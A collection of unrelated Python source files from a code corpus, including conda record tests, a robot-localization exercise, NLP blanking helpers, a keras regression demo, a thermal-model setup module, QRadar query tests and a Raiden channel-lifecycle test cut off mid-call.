# NOTE(review): DBTool semantics are not visible here -- create_from_dir
# presumably builds tables from definition files in the given directory;
# confirm against TableTool.py.
dbt = DBTool("127.0.0.1")
dbt.create_from_dir(".")
# dbt.init_data_from_dir("Data")
| StarcoderdataPython |
258083 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from logging import getLogger
from unittest import TestCase
from conda.base.context import context
from conda.common.compat import text_type
from conda.models.channel import Channel
from conda.models.index_record import IndexJsonRecord, PackageRecord
from conda.models.prefix_record import PrefixRecord
log = getLogger(__name__)
blas_value = 'accelerate' if context.subdir == 'osx-64' else 'openblas'
class PrefixRecordTests(TestCase):
    """Unit tests for PrefixRecord/PackageRecord construction and dumping."""

    def test_prefix_record_no_channel(self):
        """A record built from only a URL infers channel, subdir and fn,
        and dump() round-trips all fields."""
        pr = PrefixRecord(
            name='austin',
            version='1.2.3',
            build_string='py34_2',
            build_number=2,
            url="https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2",
            subdir="win-32",
            md5='0123456789',
            files=(),
        )
        # Channel/subdir/filename are derived from the URL.
        assert pr.url == "https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2"
        assert pr.channel.canonical_name == 'defaults'
        assert pr.subdir == "win-32"
        assert pr.fn == "austin-1.2.3-py34_2.tar.bz2"
        channel_str = text_type(Channel("https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2"))
        assert channel_str == "https://repo.anaconda.com/pkgs/free/win-32"
        assert dict(pr.dump()) == dict(
            name='austin',
            version='1.2.3',
            build='py34_2',
            build_number=2,
            url="https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2",
            md5='0123456789',
            files=(),
            channel=channel_str,
            subdir="win-32",
            fn="austin-1.2.3-py34_2.tar.bz2",
            constrains=(),
            depends=(),
        )

    def test_index_record_timestamp(self):
        """Second-resolution timestamps are normalized to milliseconds;
        millisecond timestamps pass through unchanged."""
        # regression test for #6096
        ts = 1507565728
        new_ts = ts * 1000
        rec = PackageRecord(
            name='test-package',
            version='1.2.3',
            build='2',
            build_number=2,
            timestamp=ts
        )
        assert rec.timestamp == new_ts
        assert rec.dump()['timestamp'] == new_ts
        ts = 1507565728999
        new_ts = ts
        rec = PackageRecord(
            name='test-package',
            version='1.2.3',
            build='2',
            build_number=2,
            timestamp=ts
        )
        assert rec.timestamp == new_ts
        assert rec.dump()['timestamp'] == new_ts
| StarcoderdataPython |
1938384 | # ----------
# Background
#
# A robotics company named Trax has created a line of small self-driving robots
# designed to autonomously traverse desert environments in search of undiscovered
# water deposits.
#
# A Traxbot looks like a small tank. Each one is about half a meter long and drives
# on two continuous metal tracks. In order to maneuver itself, a Traxbot can do one
# of two things: it can drive in a straight line or it can turn. So to make a
# right turn, A Traxbot will drive forward, stop, turn 90 degrees, then continue
# driving straight.
#
# This series of questions involves the recovery of a rogue Traxbot. This bot has
# gotten lost somewhere in the desert and is now stuck driving in an almost-circle: it has
# been repeatedly driving forward by some step size, stopping, turning a certain
# amount, and repeating this process... Luckily, the Traxbot is still sending all
# of its sensor data back to headquarters.
#
# In this project, we will start with a simple version of this problem and
# gradually add complexity. By the end, you will have a fully articulated
# plan for recovering the lost Traxbot.
#
# ----------
# Part One
#
# Let's start by thinking about circular motion (well, really it's polygon motion
# that is close to circular motion). Assume that Traxbot lives on
# an (x, y) coordinate plane and (for now) is sending you PERFECTLY ACCURATE sensor
# measurements.
#
# With a few measurements you should be able to figure out the step size and the
# turning angle that Traxbot is moving with.
# With these two pieces of information, you should be able to
# write a function that can predict Traxbot's next location.
#
# You can use the robot class that is already written to make your life easier.
# You should re-familiarize yourself with this class, since some of the details
# have changed.
#
# ----------
# YOUR JOB
#
# Complete the estimate_next_pos function. You will probably want to use
# the OTHER variable to keep track of information about the runaway robot.
#
# ----------
# GRADING
#
# We will make repeated calls to your estimate_next_pos function. After
# each call, we will compare your estimated position to the robot's true
# position. As soon as you are within 0.01 stepsizes of the true position,
# you will be marked correct and we will tell you how many steps it took
# before your function successfully located the target bot.
# These import steps give you access to libraries which you may (or may
# not) want to use.
from robot import *
from math import sin, cos, acos, atan2
from matrix import *
import random
def state_from_measurements(three_measurements):
    """
    Estimate the robot's state from its last three (x, y) measurements.

    Each robot move is assumed to be a fixed "step" followed by a fixed
    "turn"; three positions give two displacement vectors, from which the
    turn angle, heading and step size are inferred.

    Parameters
    ----------
    three_measurements : sequence of (x, y) pairs
        Position history; only the last three entries are used.

    Returns
    -------
    matrix
        Column state vector [x, y, theta0, v0, w0]: last measured position,
        heading after the last move, step size and turn angle per move.
    """
    x1, y1 = three_measurements[-3]
    x2, y2 = three_measurements[-2]
    x3, y3 = three_measurements[-1]
    # Last two displacement vectors between consecutive measurements.
    vec_1 = [x2 - x1, y2 - y1]
    vec_2 = [x3 - x2, y3 - y2]
    # Turn angle from the dot product of the two displacement vectors.
    dot = sum(v1 * v2 for v1, v2 in zip(vec_1, vec_2))
    mag_v1 = sqrt(sum(v ** 2 for v in vec_1))
    mag_v2 = sqrt(sum(v ** 2 for v in vec_2))
    v0 = mag_v2
    # Clamp to [-1, 1]: floating-point round-off can push the cosine just
    # outside acos's domain and raise a ValueError otherwise.
    cos_w = max(-1.0, min(1.0, dot / (mag_v1 * mag_v2)))
    w0 = acos(cos_w)
    theta0 = atan2(vec_2[1], vec_2[0]) + w0
    return matrix([[x3], [y3], [theta0], [v0], [w0]])
def estimate_next_pos(measurement, OTHER = None):
    """Estimate the next (x, y) position of the wandering Traxbot
    based on its (x, y) measurements.

    The first two calls just echo the measurement back while history
    accumulates; from the third call on, the last three measurements are
    used to recover the bot's step size and turn angle and extrapolate
    one move ahead.

    Parameters
    ----------
    measurement : (x, y) tuple
    OTHER : list or None
        Measurement history carried between calls; created on first call.

    Returns
    -------
    (estimate, OTHER) where estimate is the predicted [x, y].
    """
    if OTHER is None:
        OTHER = []
    OTHER.append(measurement)
    # Only the last three measurements are ever needed by
    # state_from_measurements; trimming stops OTHER growing without bound.
    del OTHER[:-3]
    if len(OTHER) < 3:
        # Not enough history yet: best guess is the current position.
        return ([measurement[0], measurement[1]], OTHER)
    state = state_from_measurements(OTHER)
    # Extrapolate one move ahead from the recovered state.
    x, y = state.value[0][0], state.value[1][0]
    theta, v, w = state.value[2][0], state.value[3][0], state.value[4][0]
    est_xy = [x + v * cos(theta),
              y + v * sin(theta)]
    return (est_xy, OTHER)
# A helper function you may find useful.
def distance_between(point1, point2):
    """Return the Euclidean distance between two (x, y) points."""
    dx = point2[0] - point1[0]
    dy = point2[1] - point1[1]
    return sqrt(dx * dx + dy * dy)
# This is here to give you a sense for how we will be running and grading
# your code. Note that the OTHER variable allows you to store any
# information that you want.
def demo_grading(estimate_next_pos_fcn, target_bot, OTHER = None):
    """Grading harness: repeatedly ask the estimator for the bot's next
    position, move the bot, and stop once the guess is within 1% of the
    bot's step distance. Returns True on successful localization."""
    localized = False
    distance_tolerance = 0.01 * target_bot.distance
    ctr = 0
    # if you haven't localized the target bot, make a guess about the next
    # position, then we move the bot and compare your guess to the true
    # next position. When you are close enough, we stop checking.
    while not localized and ctr <= 10:
        ctr += 1
        measurement = target_bot.sense()
        position_guess, OTHER = estimate_next_pos_fcn(measurement, OTHER)
        target_bot.move_in_circle()
        true_position = (target_bot.x, target_bot.y)
        error = distance_between(position_guess, true_position)
        print(error)
        if error <= distance_tolerance:
            print("You got it right! It took you ", ctr, " steps to localize.")
            localized = True
        # NOTE(review): this fires on the 10th pass even though the loop
        # condition still allows an 11th -- looks like an off-by-one in the
        # step budget; confirm the intended limit.
        if ctr == 10:
            print("Sorry, it took you too many steps to localize the target.")
    return localized
# This is a demo for what a strategy could look like. This one isn't very good.
def naive_next_pos(measurement, OTHER = None):
    """Baseline strategy: latch the first reported position and always
    predict that the target will return to it. Deliberately weak -- it
    only succeeds if the target revisits its starting point."""
    if not OTHER:
        # First call: remember the first measurement as the permanent guess.
        OTHER = measurement
    return OTHER, OTHER
# This is how we create a target bot. Check the robot.py file to understand
# How the robot class behaves.
# NOTE(review): argument order assumed to be (x, y, heading, turning, distance)
# with a 34-sided polygon "circle" -- confirm in robot.py. All noise disabled.
test_target = robot(2.1, 4.3, 0.5, 2*pi / 34.0, 1.5)
test_target.set_noise(0.0, 0.0, 0.0)
#demo_grading(naive_next_pos, test_target)
demo_grading(estimate_next_pos, test_target)
| StarcoderdataPython |
9707666 | __all__ = ['load', 'noise']
from . import load | StarcoderdataPython |
153734 | <filename>polyjuice/generations/create_blanks.py<gh_stars>10-100
import numpy as np
from ..helpers import unify_tags, flatten_fillins
from .special_tokens import BLANK_TOK
def create_blanked_sents(doc, indexes=None):
    """Produce blanked variants of *doc* with [BLANK] placeholder tokens.

    Parameters
    ----------
    doc : parsed document (spaCy-like: indexable tokens with .dep_ etc.)
    indexes : optional
        A single [start, end) pair, a list of such pairs, or a list of
        pair-lists. If omitted, up to 3 random span sets are sampled.

    Returns
    -------
    set of str : unique blanked renderings of the document.
    """
    if indexes:
        # Normalize a single [start, end] pair into a list of spans.
        if type(indexes[0]) == int:
            indexes = [indexes]
        indexes_list = indexes #[indexes]
    else:
        indexes_list = get_random_idxes(
            doc, is_token_only=False, max_count=3)
    # One blanked string per span set; set() drops duplicates.
    blanks = set([flatten_fillins(
        doc, indexes, [BLANK_TOK] * len(indexes)) \
        for indexes in indexes_list])
    return blanks
# the function for placing BLANKS.
def get_one_random_idx_set(
doc, max_blank_block=3, req_dep=None, blank_type_prob=None,
pre_selected_idxes=None, is_token_only=False):
if req_dep is not None:
if type(req_dep) == str: req_dep = [req_dep]
idx_range = [i for i, token in enumerate(doc) if token.dep_ in req_dep or unify_tags(token.dep_) in req_dep]
else:
idx_range = list(range(len(doc)))
# only keep those pre_selected_idxes
if pre_selected_idxes is not None:
idx_range = [i for i in idx_range if i in pre_selected_idxes]
max_blank_block = min(len(idx_range), max_blank_block)
#print(req_dep, idx_range)
selected_indexes = []
while max_blank_block > 0 and not selected_indexes:
# if fixed the thing to change, then do one specific change
n_perturb = np.random.choice(list(range(1, max_blank_block+1))) #if req_dep is None else 1
replace_idx, total_run = -1, 1000
while (total_run > 0 and n_perturb > 0): #and len(span_and_edits) == 0:
replace_idx = np.random.choice(idx_range)
token = doc[replace_idx]
if token.is_punct:
total_run -= 1
continue
if blank_type_prob: p = blank_type_prob
else:
# if fixed the tree, then mostly use the tree
if is_token_only: p = [0.7, 0, 0.3]
elif req_dep is None: p = [0.4, 0.35, 0.25]
else: p = [0.1, 0.7, 0.2]
is_replace_subtree = np.random.choice(["token", "subtree", "insert"], p=p)
if is_replace_subtree == "subtree":
start, end = token.left_edge.i, token.right_edge.i+1
elif is_replace_subtree == "token":
start, end = token.i, token.i+1
else:
start, end = token.i, token.i
if all([end < sstart or start > send for sstart, send in selected_indexes]):
selected_indexes.append([start, end])
n_perturb -= 1
total_run -= 1
return sorted(selected_indexes, key=lambda idx: (idx[0], idx[1]))
def get_random_idxes(doc,
                     pre_selected_idxes=None,
                     deps=None, is_token_only=False,
                     max_blank_block=3, max_count=None):
    """Sample several distinct sets of blank spans for *doc*.

    For each dependency-label group (or the defaults) a few random span
    sets are drawn via get_one_random_idx_set; duplicates are removed and,
    if *max_count* is given, the result is subsampled to that many entries.

    Returns
    -------
    list of span-set lists; each span is a [start, end) token index pair.
    """
    # The whole-sentence span is always a candidate (unless token-only mode).
    unique_blanks = {str([[0, len(doc)]]): [[0, len(doc)]]}
    default_deps = [None, "", ["subj","obj"], ["aux", "ROOT"], ["conj", "modifier", "clause"]]
    if is_token_only:
        unique_blanks = {}
    if deps is None: deps = default_deps
    for dep in deps:
        # for each different dep, get some blank
        rounds = 1 if dep is not None else 2
        if is_token_only:
            rounds = 5
        for _ in range(rounds):
            # "" is a sentinel meaning "no sampling for this entry".
            curr_idx = get_one_random_idx_set(
                doc, req_dep=dep,
                max_blank_block=max_blank_block,
                pre_selected_idxes=pre_selected_idxes,
                is_token_only=is_token_only) if dep != "" else None
            if curr_idx is not None:
                # Key by string form so identical span sets collapse.
                unique_blanks[str(curr_idx)] = curr_idx
    unique_blanks = list(unique_blanks.values())
    if max_count is not None:
        try:
            unique_blanks = list(np.random.choice(
                np.array(unique_blanks, dtype="object"),
                min(len(unique_blanks), max_count),
                replace=False))
        except Exception:
            # np.random.choice rejects ragged object arrays with
            # "a must be 1-dimensional"; fall back to a deterministic
            # prefix instead of crashing. (Was a bare `except:`, which
            # also swallowed SystemExit/KeyboardInterrupt.)
            unique_blanks = unique_blanks[:max_count]
    return unique_blanks
| StarcoderdataPython |
369372 | <filename>Machine learning/ML/supervised_ML_Deep_learning/tf_1.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from sklearn.metrics import mean_squared_error
# ---------------------------
# Create data with a broadly linear shape: y = m*x + b + Gaussian noise.
# ------
m =2
b =3
x = np.linspace(0,50,100)
np.random.seed(101)
noise = np.random.normal(loc=0, scale=4, size=len(x)) #loc is mean, scale is std, size is how many values (one per x, i.e. 100)
# Compute the target values.
# NOTE(review): uses the literal 2 instead of m (same value today, but m is
# otherwise unused -- probably meant to be m*x).
y = (2*x) + b + noise
# plt.plot(x, y, '*') # '*' draws point markers
# plt.show()
# Build a keras model with dense layers
# ------
# choose model and add layers => input, hidden and output
# first number is the neuron count, activation is the activation function,
# input dimension is 1 (x is the only feature)
model = keras.Sequential(
    [
        layers.Dense(4, input_shape=(1,), activation="relu", name="layer1"),
        layers.Dense(4, activation="relu", name="layer2"),
        layers.Dense(1, name="layer3"),
    ]
)
# Calling the model once on dummy input builds it (creates the weights).
# NOTE(review): this rebinds b (previously the intercept) to the model's
# output tensor; b is not used again afterwards, but the reuse is confusing.
a = tf.ones((1, 1))
b = model(a)
print("----------")
print("Number of weights after calling the model:", len(model.weights))
# compile the model and see the summary details
model.compile(loss='mse', optimizer='adam')
model.summary()
# # fit the model
# # ------
# # epochs will depend on how big the dataset is, etc.
model.fit(x, y, epochs=250)
# see model results
# ------
# loss history: one entry per epoch
loss = model.history.history['loss']
# print(loss)
# #to plot the evolution of the model vs the loss function
epochs = range(len(loss))
# plt.plot(epochs, loss)
# plt.show()
# now run the regression against the data (= full forecast)
# ------
predictions = model.predict(x)
plt.plot(x,y, '*')
plt.plot(x, predictions, 'r')
plt.show()
# verify errors
# ------
mse = mean_squared_error(y, predictions)
print(mse) | StarcoderdataPython |
135758 | _iterable = ['danilo', 'daniel', 'lucas', 'matheus', 'luana', 'claudiane', 'luan']
alfa = [chr(l) for l in range(ord('a'), ord('z')+1]
for name1 in range(len(_iterable)):
for name2 in range(name1+1, len(_iterable)):
c = 0
while True:
if alfa.index(_iterable[name1][c]) != alfa.index(_iterable[name2][c]):
if alfa.index(_iterable[name1][c]) > alfa.index(_iterable[name2][c]):
_iterable.insert(name1, _iterable.pop(name2))
break
if set(_iterable[name1]).difference(set(_iterable[name2])) == set():
if len(_iterable[name1]) < len(_iterable[name2]):
small = name1
pos = name2
else:
small = name2
pos = name1
_iterable.insert(pos, _iterable.pop(small))
break
c += 1
print(_iterable)
print(sorted(_iterable))
| StarcoderdataPython |
6662291 | import importlib
import numpy as np
from copy import deepcopy
from types import ModuleType
# from .utils import get_logger
# logger = get_logger(__name__)
import logging
logger = logging.getLogger(__name__)
import thermal_history as th
from .model_classes import ThermalModel
def setup_model(parameters, core_method = None,
                stable_layer_method = None,
                mantle_method = None,
                verbose=True,
                log_file='out.log'):
    '''Setup main model

    Parameters
    ----------
    parameters : Parameters class
        Instance of Parameters class
    core_method : String, optional
        Name of method to solve for the core, by default None
    stable_layer_method : String, optional
        Name of method to solve for the stable layer, by default None
    mantle_method : String, optional
        Name of method to solve for the mantle, by default None
    verbose : bool, optional
        If True, progress information will be printed to STDOUT, by default True
    log_file : String, optional
        name of the log file, by default out.log

    Returns
    -------
    ThermalModel
        Instance of the main model class using the given methods and parameters

    Raises
    ------
    ValueError
        If a region is specified in the parameters but no method is given in the corresponding keyword argument
    ValueError
        If a specified method cannot be imported
    '''

    methods = {'core': core_method,
               'stable_layer': stable_layer_method,
               'mantle': mantle_method}

    #Check that supplied methods are consistent with regions specified in parameters
    for key, r in methods.items():
        if r is None and getattr(parameters, key):
            raise ValueError(f'{key} is set to True in parameters but a method has not been specified for it')
        elif isinstance(r, str) and not getattr(parameters, key):
            if verbose:
                print(f'{key} is set to False in parameters but a method has been specified for that region. Ignoring method specified.')
            methods[key] = None

    required_params = {}
    optional_params = {}
    regions = [x for x in methods.keys() if getattr(parameters, x)]

    #Check each region and import the relevant python module and add to methods dict.
    for r in regions:
        required_params[r] = {}
        optional_params[r] = {}

        if hasattr(parameters, r):
            if getattr(parameters, r):
                try:
                    # Replace the method *name* with the imported solver module.
                    methods[r] = importlib.import_module(f'thermal_history.{r}_models.{methods[r]}.main')
                except Exception as e:
                    raise ValueError(f'{e}\nCannot import thermal_history.{r}_models.{methods[r]}.main')

                #Get required parameters from method 'r' and append to full required params dict
                try:
                    required_params[r].update(methods[r].required_params)
                except AttributeError:
                    # The solver module must declare `required_params`.
                    # (Was a bare `except:`, which also hid unrelated errors.)
                    raise ValueError(f'No required_params defined in {methods[r]}')

                #Add optional parameters as well if they exist
                if hasattr(methods[r], 'optional_params'):
                    optional_params[r].update(methods[r].optional_params)

            else:
                raise ValueError(f'{r} is set to False in parameters')
        else:
            raise ValueError(f'{r} not set to True or False in parameters')

    assert len(regions) > 0, 'No models specified'

    #Check that all necessary inputs have been specified in parameters.
    th.utils.check_parameters(parameters, regions, required_params, optional_params, verbose=verbose)

    #Set optional parameters to their default values if not set in parameter file
    for r in regions:
        for key, value in optional_params[r].items():
            if not hasattr(parameters, key):
                # value is (description, default); index 1 is the default.
                setattr(parameters, key, value[1])

    return ThermalModel(parameters, methods, verbose=verbose, log_file=log_file)
class Parameters:
    '''Parameters class

    An instance of this class contains all of the parameters and is accessible to the main model
    '''

    # Physical constants shared by all models.
    ys = 60*60*24*365     #Seconds in a year
    ev = 1.602e-19        #Electron volt
    kb = 1.3806485e-23    #Boltzmanns constant
    G  = 6.67e-11         #Gravitational Constant
    Na = 6.022140857e23   #Avogadros Constant
    Rg = 8.31446261815324 #Gas constant

    def __init__(self, parameters, folder='', copy=False):
        '''Initialises the class with input files

        Parameters
        ----------
        parameters : str/list/tuple
            A string or list/tuple of strings with the filenames of the parameter files. If copy is True then this can be another Parameters instance.
        folder : str, optional
            folder the parameters files exist in, to save typing out the full relative file path for each.
        copy : bool, optional
            If True, the parameters argument is instead taken to be another Parameters instance and a copy of it is returned, by default False

        Raises
        ------
        ValueError
            If a parameter is specified twice with different values
        '''

        # if copy:
        #     for key in parameters.__dict__.keys():
        #         setattr(self, key, deepcopy(getattr(parameters, key)))

        # else:
        if not copy:
            assert type(parameters) in [str,list,tuple], 'input parameters must be a single string or list/tuple'
            if type(parameters) == str:
                parameters = [parameters]

            params = list(parameters)

            #Make sure folder has a trailing slash
            if len(folder)>1 and not folder[-1] == '/':
                folder+='/'

            # Load each parameter file as a throwaway module and execute it,
            # so its top-level assignments become module attributes.
            for i,p in enumerate(params):
                if type(p) == str:
                    spec = importlib.util.spec_from_file_location('params'+str(i+1), folder+p)
                    params[i] = importlib.util.module_from_spec(spec)
                    spec.loader.exec_module(params[i])
        else:
            #An existing parameters class has been provided
            params = [parameters]

        # Copy every public, non-module attribute from each source onto self.
        for prm in params:
            keys = [key for key in prm.__dict__.keys() if ('__' not in key and not type(getattr(prm,key))==ModuleType)]
            for key in keys:
                value = deepcopy(getattr(prm,key))

                if type(value)==list: #Lists should be converted to arrays
                    value = np.array(value)

                if not hasattr(self,key):
                    setattr(self, key, value)
                # NOTE(review): for numpy-array values this `==` yields an
                # elementwise array, and `not array` raises for size > 1 --
                # confirm duplicate detection works for array parameters.
                elif not value == getattr(self,key):
                    v1, v2 = getattr(self,key), value
                    raise ValueError('multiple instances of {} in provided parameters files: \n{}\n{}'.format(key,v1,v2))
| StarcoderdataPython |
3206042 | <reponame>mrillusi0n/compete
def digit_set(n):
    """Return the set of decimal digits appearing in n.

    Matches the original peel-off loop exactly, including the edge case
    that digit_set(0) is the empty set (the loop body never runs).
    """
    digits = set()
    while n:
        n, last = divmod(n, 10)
        digits.add(last)
    return digits
def get_next(n):
    """Return the smallest number not yet in the global NUMS set that
    shares no decimal digit with n, and record it in NUMS."""
    global NUMS
    forbidden = digit_set(n)
    candidate = 0
    # Linear scan from 0: skip used numbers and digit collisions.
    while candidate in NUMS or digit_set(candidate) & forbidden:
        candidate += 1
    NUMS.add(candidate)
    return candidate
# Seed the sequence with 0..10 as already "used", then extend it 490 times:
# each new element avoids all digits of its predecessor.
nums = [i for i in range(11)]
NUMS = set(nums)
for _ in range(490):
    nums.append(get_next(nums[-1]))
print(nums[11]) # read the given index and supply here
| StarcoderdataPython |
4845930 | <filename>experiments/__init__.py
import os
import pkgutil
import importlib
from core.experiments import Experiment
# Auto-discover Experiment subclasses: import every module in this package so
# their class definitions execute and register as subclasses of Experiment.
# (The initial empty dict is immediately rebuilt below.)
experiments_by_name = {}
pkg_dir = os.path.dirname(__file__)
for (module_loader, name, ispkg) in pkgutil.iter_modules([pkg_dir]):
    importlib.import_module('.' + name, __package__)
# Direct subclasses plus one level of grandchildren of Experiment.
all_subclasses = Experiment.__subclasses__() + [s for ss in [s.__subclasses__() for s in Experiment.__subclasses__()] for s in ss]
experiments_by_name = {cls.name: cls for cls in all_subclasses if hasattr(cls, 'name')}
def get_experiment_by_name(exp_name):
    """Return the Experiment subclass registered under *exp_name*.

    Raises KeyError if no experiment declared that name.
    """
    return experiments_by_name[exp_name]
| StarcoderdataPython |
4872218 | #encoding: utf-8
#
# Unit tests for function_utils.py
#
from fn_qradar_integration.util import function_utils
def test_query_string():
    """Verify make_query_string substitutes %paramN% placeholders in order."""
    # One test with real data
    input_string = "SELECT %param1% FROM events WHERE INOFFENSE(%param2%) LAST %param3% MINUTES"
    params = ["DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm') as StartTime, CATEGORYNAME(category), LOGSOURCENAME(logsourceid), PROTOCOLNAME(protocolid), RULENAME(creeventlist)",
              "38",
              "100"]
    query_str = function_utils.make_query_string(input_string, params)
    str_expect = "SELECT DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm') as StartTime, CATEGORYNAME(category), LOGSOURCENAME(logsourceid), PROTOCOLNAME(protocolid), RULENAME(creeventlist)" \
                 " FROM events WHERE INOFFENSE(38) LAST 100 MINUTES"
    assert query_str == str_expect

    # one more random test: four placeholders interleaved with literal parts
    str1 = "First part string "
    str2 = " Second part string "
    str3 = " Third part string "
    str4 = " Forth part string "
    str5 = " Fifth part string "
    input_string = str1 + "%param1%" + str2 + "%param2%" + str3 + "%param3%" + str4 + "%param4%" + str5
    params = ["Param1", "Param2", "Param3", "Param4"]
    query_str = function_utils.make_query_string(input_string, params=params)
    str_expect = str1 + params[0] + str2 + params[1] + str3 + params[2] + str4 + params[3] + str5
    assert query_str == str_expect
def test_fix_dict():
    """Verify fix_dict_value stringifies non-string values (ints, lists,
    nested dicts) while preserving plain and unicode strings unchanged."""
    input_dict = {"key1": 10,
                  "key2": "string",
                  "key3": ["l1", "l2"],
                  "key4": {"k1": "v1",
                           "k2": "v2"},
                  "key5": "çø∂",
                  "key6": u"çø∂",
                  "key7": [u"çø∂", "çø∂"]}

    ret_dicts = function_utils.fix_dict_value([input_dict])

    # Scalars and containers are converted to their str() form...
    assert ret_dicts[0]["key1"] == "10"
    assert ret_dicts[0]["key2"] == "string"
    assert ret_dicts[0]["key3"] == str(input_dict["key3"])
    assert ret_dicts[0]["key4"] == str(input_dict["key4"])
    # ...while unicode string values survive unchanged.
    assert ret_dicts[0]["key5"] == "çø∂"
    assert ret_dicts[0]["key6"] == u"çø∂"
    assert ret_dicts[0]["key7"]
| StarcoderdataPython |
6574922 | import pytest
from eth_utils import to_checksum_address
from raiden.api.python import RaidenAPI
from raiden.exceptions import (
DepositMismatch,
InvalidSettleTimeout,
TokenNotRegistered,
UnexpectedChannelState,
UnknownTokenAddress,
)
from raiden.tests.utils.detect_failure import raise_on_failure
from raiden.tests.utils.events import must_have_event, wait_for_state_change
from raiden.tests.utils.factories import make_address
from raiden.tests.utils.transfer import get_channelstate
from raiden.transfer import channel, views
from raiden.transfer.state import ChannelState, NetworkState
from raiden.transfer.state_change import ContractReceiveChannelSettled
from raiden_contracts.constants import ChannelEvent
@raise_on_failure
@pytest.mark.parametrize("number_of_nodes", [2])
@pytest.mark.parametrize("number_of_tokens", [1])
def test_token_addresses(raiden_network, token_addresses):
    """
    Test that opening a channel via the API provides the confirmed block and not
    the latest block. The discrepancy there lead to potential timing issues where
    the token network was deployed for the state in the "latest" block but not yet
    in the confirmed state and a BadFunctionCallOutput exception was thrown from web3.

    Regression test for 4470
    """
    app0, app1 = raiden_network
    token_address = token_addresses[0]

    # Find block where the token network was deployed
    token_network_address = views.get_token_network_address_by_token_address(
        views.state_from_app(app0), app0.raiden.default_registry.address, token_address
    )
    last_number = app0.raiden.rpc_client.block_number()

    # Walk backwards from the chain head until the contract code disappears;
    # the first block after that is the deployment block.
    for block_number in range(last_number, 0, -1):
        code = app0.raiden.rpc_client.web3.eth.getCode(
            to_checksum_address(token_network_address), block_number
        )
        if code == b"":
            break
    token_network_deploy_block_number = block_number + 1

    api0 = RaidenAPI(app0.raiden)
    # Emulate the confirmed block being a block where TokenNetwork for token_address
    # has not been deployed.
    views.state_from_raiden(app0.raiden).block_hash = app0.raiden.rpc_client.get_block(
        token_network_deploy_block_number - 1
    )["hash"]

    msg = (
        "Opening a channel with a confirmed block where the token network "
        "has not yet been deployed should raise a TokenNotRegistered error"
    )
    with pytest.raises(TokenNotRegistered):
        api0.channel_open(
            registry_address=app0.raiden.default_registry.address,
            token_address=token_address,
            partner_address=app1.raiden.address,
        )

        pytest.fail(msg)
def run_test_token_addresses(raiden_network, token_addresses):
    """Check the registry reports exactly the parametrized token addresses.

    NOTE(review): despite the name, this is independent of the test above;
    it only asserts get_tokens_list matches the fixture's token set.
    """
    app = raiden_network[0]
    api = RaidenAPI(app.raiden)
    registry_address = app.raiden.default_registry.address
    assert set(api.get_tokens_list(registry_address)) == set(token_addresses)
@raise_on_failure
@pytest.mark.parametrize("number_of_nodes", [2])
@pytest.mark.parametrize("channels_per_node", [0])
def test_raidenapi_channel_lifecycle(
    raiden_network, token_addresses, deposit, retry_timeout, settle_timeout_max
):
    """Uses RaidenAPI to go through a complete channel lifecycle:
    open (with settle-timeout bounds checks), deposit (with mismatch
    checks), close, and settle.

    Note: the third channel_open call below had its token_address keyword
    value corrupted in the source (`<PASSWORD>_address`); restored to
    `token_address` to match the three sibling calls.
    """
    node1, node2 = raiden_network
    token_address = token_addresses[0]
    token_network_address = views.get_token_network_address_by_token_address(
        views.state_from_app(node1), node1.raiden.default_registry.address, token_address
    )

    api1 = RaidenAPI(node1.raiden)
    api2 = RaidenAPI(node2.raiden)

    registry_address = node1.raiden.default_registry.address

    # nodes don't have a channel, so they are not healthchecking
    assert api1.get_node_network_state(api2.address) == NetworkState.UNKNOWN
    assert api2.get_node_network_state(api1.address) == NetworkState.UNKNOWN
    assert not api1.get_channel_list(registry_address, token_address, api2.address)

    # Make sure invalid arguments to get_channel_list are caught
    with pytest.raises(UnknownTokenAddress):
        api1.get_channel_list(
            registry_address=registry_address, token_address=None, partner_address=api2.address
        )

    address_for_lowest_settle_timeout = make_address()
    lowest_valid_settle_timeout = node1.raiden.config["reveal_timeout"] * 2

    # Make sure a settle timeout below the minimum is rejected when opening
    with pytest.raises(InvalidSettleTimeout):
        api1.channel_open(
            registry_address=node1.raiden.default_registry.address,
            token_address=token_address,
            partner_address=address_for_lowest_settle_timeout,
            settle_timeout=lowest_valid_settle_timeout - 1,
        )

    # Make sure the smallest valid settle timeout is accepted
    api1.channel_open(
        registry_address=node1.raiden.default_registry.address,
        token_address=token_address,
        partner_address=address_for_lowest_settle_timeout,
        settle_timeout=lowest_valid_settle_timeout,
    )

    address_for_highest_settle_timeout = make_address()
    highest_valid_settle_timeout = settle_timeout_max

    # Make sure a settle timeout above the maximum is rejected when opening
    with pytest.raises(InvalidSettleTimeout):
        api1.channel_open(
            registry_address=node1.raiden.default_registry.address,
            token_address=token_address,
            partner_address=address_for_highest_settle_timeout,
            settle_timeout=highest_valid_settle_timeout + 1,
        )

    # Make sure the highest settle timeout is accepted
    api1.channel_open(
        registry_address=node1.raiden.default_registry.address,
        token_address=token_address,
        partner_address=address_for_highest_settle_timeout,
        settle_timeout=highest_valid_settle_timeout,
    )

    # open is a synchronous api
    api1.channel_open(node1.raiden.default_registry.address, token_address, api2.address)
    channels = api1.get_channel_list(registry_address, token_address, api2.address)
    assert len(channels) == 1

    channel12 = get_channelstate(node1, node2, token_network_address)
    assert channel.get_status(channel12) == ChannelState.STATE_OPENED

    channel_event_list1 = api1.get_blockchain_events_channel(
        token_address, channel12.partner_state.address
    )
    assert must_have_event(
        channel_event_list1,
        {
            "event": ChannelEvent.OPENED,
            "args": {
                "participant1": to_checksum_address(api1.address),
                "participant2": to_checksum_address(api2.address),
            },
        },
    )

    network_event_list1 = api1.get_blockchain_events_token_network(token_address)
    assert must_have_event(network_event_list1, {"event": ChannelEvent.OPENED})

    registry_address = api1.raiden.default_registry.address
    # Check that giving a 0 total deposit is not accepted
    with pytest.raises(DepositMismatch):
        api1.set_total_channel_deposit(
            registry_address=registry_address,
            token_address=token_address,
            partner_address=api2.address,
            total_deposit=0,
        )
    # Load the new state with the deposit
    api1.set_total_channel_deposit(
        registry_address=registry_address,
        token_address=token_address,
